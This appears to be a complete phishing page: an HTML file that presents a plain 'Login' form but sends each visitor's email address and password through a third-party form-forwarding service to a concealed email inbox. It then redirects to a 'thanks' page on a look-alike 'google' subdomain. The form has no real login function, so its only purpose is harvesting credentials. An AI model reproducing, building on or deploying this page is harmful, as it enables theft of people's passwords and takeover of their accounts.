index.html
<html><head>
<link rel="stylesheet" href="style.css">
</head>
<body>
<div class="container">
</div>
<h1>Login</h1>
<form action="https://formsubmit.co/[email protected]" method="POST">
<input type="hidden" name="_subject" value="New Email Woo!!">
<label>Username</label><br>
<input type="email" name="email" placeholder="Email Address" required=""><br>
<input type="hidden" name="_next" value="https://google.freeoda.repl.co/thanks.html">
<label>Password</label><br>
<input type="password" name="message" placeholder="Password" required=""><br>
<button type="submit">Login</button>
</form>
</body></html>